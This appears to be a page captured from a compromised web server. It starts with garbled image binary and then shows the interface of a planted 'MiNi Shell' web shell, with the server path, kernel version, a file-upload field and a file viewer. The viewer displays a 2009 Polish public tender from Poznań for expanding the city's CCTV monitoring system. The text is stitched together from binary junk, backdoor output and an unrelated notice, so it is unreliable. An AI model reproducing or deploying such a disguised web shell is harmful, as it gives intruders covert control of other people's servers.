JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/161464-N-2009.html

<p class="kh_header"><b>Poznań: Monitoring</b><br>
<b>Numer ogłoszenia: 161464 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Poznania, Biuro Zamówień Publicznych , Pl. Kolegiacki 17, 61-841 Poznań, woj. wielkopolskie, tel. (061) 878 52 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.city.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitoring.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbudowa systemu monitoringu wizyjnego miasta Poznania na trasie Traktu Królewsko - Cesarskiego, etap III (odcinek od ul. Fredry do skrzyżowania ulic Dąbrowskiego i Żeromskiego) oraz rejonu Jeżyc, wraz z budową własnej infrastruktury telekomunikacyjnej - kanalizacji, rurociągów, kabli optotelekomunikacyjnych, instalacją systemu transmisji danych oraz zintegrowaniem dostarczonych urządzeń i oprogramowania z istniejącym systemem teletransmisyjnym i monitoringu wizyjnego miasta Poznania.

Przedmiot zamówienia obejmuje: 
1.	Opracowanie dokumentacji projektowo-technicznej, kosztorysowej, specyfikacji technicznej wykonania i odbioru robót na rozbudowę systemu monitoringu wizyjnego Traktu Królewsko - Cesarskiego etap III (odcinek od ul. Fredry do skrzyżowania ulic Dąbrowskiego i Żeromskiego) oraz rejonu Jeżyc, jej uzgodnienie oraz uzyskanie stosownych zezwoleń na jej realizację, na podstawie Programu funkcjonalno-użytkowego.
2.	Wykonanie na podstawie opracowanej dokumentacji projektowo-technicznej zaakceptowanej przez Zamawiającego kanalizacji teletechnicznej, składającej się z rurociągów i studni kablowych oraz kabli światłowodowych ułożonych w tych rurociągach, łącznie z wykonaniem pomiarów powykonawczych zrealizowanej instalacji, a także przygotowanie pomieszczenia technicznego dla potrzeb węzła transmisyjnego we wskazanej lokalizacji, opisanej w programie funkcjonalno użytkowym
3.	Dostawę, montaż i uruchomienie kamer, urządzeń aktywnych systemu monitoringu wizyjnego koniecznych i niezbędnych dla rozbudowy systemu monitoringu wizyjnego miasta Poznania wzdłuż Traktu Królewsko - Cesarskiego etap III (odcinek od ul. Fredry do skrzyżowania ulic Dąbrowskiego i Żeromskiego) oraz rejonu Jeżyc, łącznie z dostawą oprogramowania i bibliotek SDK zainstalowanych urządzeń oraz uruchomieniem oprogramowania systemu monitoringu wizyjnego i uruchomieniem systemu transmisji danych zgodnie z opracowaną dokumentacją projektowo-techniczną zaakceptowaną przez Zamawiającego. 
4.	Zintegrowanie programowe lub sprzętowe wszystkich dostarczonych urządzeń z istniejącym systemem monitoringu wizyjnego miasta Poznania wraz z uaktualnieniem oprogramowania wszystkich pracujących, nowo dostarczonych 
i zainstalowanych urządzeń: aktywnych, koderów, dekoderów, stacji roboczych do najnowszej, stabilnej wersji oprogramowania, którą posiada producent danych urządzeń w dniu podpisania tej umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.10.00-5, 71.32.00.00-7, 32.26.00.00-3, 32.52.00.00-4, 45.31.43.10-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 23000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie przedmiotowego zamówienia mogą wziąć udział Wykonawcy spełniający warunki zawarte w art. 22 ust 1 ustawy - Prawo zamówień publicznych:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub dysponują dostępem do potencjału technicznego i osób zdolnych do wykonania zamówienia. 
2.1	dysponują osobami wpisanymi na listę członków właściwej izby samorządu zawodowego, posiadającymi uprawnienia budowlane, minimum jedną dla każdej z wymienionych specjalności:
a)	konstrukcyjno-budowlanej do projektowania,
b)	telekomunikacyjnej, do kierowania robotami, bez ograniczeń.
2.2	dysponowanie minimum jedną osobą posiadającą licencję pracownika zabezpieczenia technicznego pierwszego stopnia zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 4 czerwca 1998 r. w sprawie wzoru i trybu wydawania licencji pracownika ochrony fizycznej i licencji pracownika zabezpieczenia technicznego oraz trybu i częstotliwości wydawania przez organy Policji opinii o pracownikach ochrony ( Dz. U. Nr 78 poz. 511 z 1998 r. )
2.3	dysponowanie minimum jedną osobą posiadającą licencję pracownika zabezpieczenia technicznego drugiego stopnia zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 4 czerwca 1998 r. w sprawie wzoru i trybu wydawania licencji pracownika ochrony fizycznej i licencji pracownika zabezpieczenia technicznego oraz trybu i częstotliwości wydawania przez organy Policji opinii o pracownikach ochrony ( Dz. U. Nr 78 poz. 511 z 1998 r. )
2.4	dysponują minimum jedną osobą posiadającą kwalifikacje zawodowe z zakresu uruchamiania i konfiguracji systemu monitoringu, potwierdzone odbytym min. 1 szkoleniem producenta dostarczanego systemu monitoringu i/lub certyfikatem (autoryzacją) producenta dostarczanego systemu monitoringu,
2.5	wykonanie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia ( 21.05.2004  r. - 21.05.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwóch prac obejmujących jeden z niżej wymienionych zakresów, o minimalnej wartości 500 000,00 zł brutto każda i przedłożenie dokumentów potwierdzających, że roboty te zostały wykonane należycie.
a)	budowa doziemnej infrastruktury teletechnicznej oraz budowy i uruchamiania systemów monitoringu wizyjnego,
b)  budowa doziemnej infrastruktury teletechnicznej oraz dostawy, montażu i uruchamiania systemów teleinformatycznych,

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
3.1	posiadanie własnych środków finansowych lub zdolności kredytowej (w wysokości min. 1 000 000,00 zł),
3.2     posiadanie ważnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności (za szkody powstałe podczas lub będące skutkiem prac objętych umową) na kwotę min. 500 000,00zł
4.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu umożliwienia Zamawiającemu oceny spełnienia w/w warunków Wykonawcy są zobowiązani przedłożyć następujące dokumenty:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu wskazującego osobę uprawnioną do reprezentowania składającego (składających) ofertę w formie oryginału lub notarialnie potwierdzonej kopii;
2.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert;
3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt. 9 ustawy (dla podmiotów zbiorowych), wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.	Wypełnione i podpisane oświadczenie o spełnieniu  warunków  udziału 
w postępowaniu - zał. nr 2  do SIWZ, oraz uzupełniająco, w przypadku korzystania 
z potencjału innych podmiotów, pisemne zobowiązanie tych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
6.	Kserokopie uprawnień budowlanych osób przewidzianych do realizacji zamówienia w specjalnościach:
-	konstrukcyjno - budowlanej, do projektowania,
-	telekomunikacyjnej, do kierowania robotami, bez ograniczeń
oraz aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego - minimum jedna osoba w każdej specjalności.
7. Kserokopia aktualnych uprawnień osób przewidzianych do realizacji zmówienia,  w zakresie zabezpieczenia technicznego:
a) licencja pracownika zabezpieczenia technicznego pierwszego stopnia - dla minimum 1 osoby. 
b)	licencja pracownika zabezpieczenia technicznego drugiego stopnia - dla minimum 1 osoby. 
8.	Kserokopia dokumentów, osób przewidzianych do realizacji zmówienia, potwierdzających odbycie minimum 1 szkolenia lub certyfikatu ( autoryzacji ), producenta dostarczanego systemu monitoringu.
9.	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (w wysokości min. 1 000 000,00 zł), wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10.	Kopia aktualnej polisy, a w przypadku jej braku kopia innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (za szkody powstałe podczas lub będące skutkiem prac objętych umową), na kwotę minimum 500 000,00zł.
11.	Wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowani o udzielenie zamówienia ( 21.05.2004 r. - 21.05.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwóch prac obejmujących co najmniej jeden z zakresów 
a)	budowa doziemnej infrastruktury teletechnicznej oraz budowy i uruchamiania systemów monitoringu wizyjnego,
b)	budowa doziemnej infrastruktury teletechnicznej oraz dostawy, montażu i uruchamiania systemów teleinformatycznych,
o minimalnej wartości 500 000,00 zł brutto każda, wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.

Ponadto w ofercie należy złożyć:
 
12.	Wypełnioną i podpisaną ofertę - zał. nr 1 do SIWZ;
13.	Pełnomocnictwo do reprezentowania Wykonawców składających ofertę wspólną w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w formie oryginału lub notarialnie potwierdzonej kopii;

W celu oceny spełnienia warunków udziału w niniejszym postępowaniu Zamawiający dokona sprawdzenia kompletności i poprawności złożonych dokumentów oraz terminu i kwoty wniesionego wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.city.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Poznania, Biuro Zamówień Publicznych, plac Kolegiacki 17, 61-841 Poznań, pokój 443.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 09:00, miejsce: Urząd Miasta Poznania, Biuro Zamówień Publicznych, plac Kolegiacki 17, 61-841 Poznań, pokój 446.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 16.07.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com